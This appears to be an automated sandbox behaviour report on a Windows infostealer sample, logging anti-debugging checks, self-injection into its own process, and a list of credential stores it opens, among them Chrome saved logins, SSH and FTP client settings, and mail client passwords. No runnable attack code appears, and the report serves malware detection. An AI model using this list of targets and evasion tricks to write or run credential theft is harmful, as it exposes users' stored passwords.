Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 2600000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: AA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 4B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 5B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 5CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 6CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 7010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 8010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 9010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: A250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: B250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: B6E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: C6E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 4B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 5CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 7020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: 8020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: A250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe TID: 7380 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Thread delayed: delay time: 60000 Jump to behavior
Source: XCN5xgaiac.exe, 00000002.00000002.1711356037.0000000000F08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: XCN5xgaiac.exe, 00000004.00000002.1674001184.0000000000D88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: XCN5xgaiac.exe, 00000005.00000002.1675547888.0000000001408000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h] 4_2_0040317B
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 4_2_00402B7C GetProcessHeap,HeapAlloc, 4_2_00402B7C
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory written: C:\Users\user\Desktop\XCN5xgaiac.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory written: C:\Users\user\Desktop\XCN5xgaiac.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Memory written: C:\Users\user\Desktop\XCN5xgaiac.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process created: C:\Users\user\Desktop\XCN5xgaiac.exe C:\Users\user\Desktop\XCN5xgaiac.exe Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process created: C:\Users\user\Desktop\XCN5xgaiac.exe C:\Users\user\Desktop\XCN5xgaiac.exe Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process created: C:\Users\user\Desktop\XCN5xgaiac.exe C:\Users\user\Desktop\XCN5xgaiac.exe Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process created: C:\Users\user\Desktop\XCN5xgaiac.exe C:\Users\user\Desktop\XCN5xgaiac.exe Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Queries volume information: C:\Users\user\Desktop\XCN5xgaiac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XCN5xgaiac.exe PID: 7308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XCN5xgaiac.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000002.1711356037.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XCN5xgaiac.exe PID: 7376, type: MEMORYSTR
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: PopPassword 4_2_0040D069
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: SmtpPassword 4_2_0040D069
Source: Yara match File source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1685515472.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs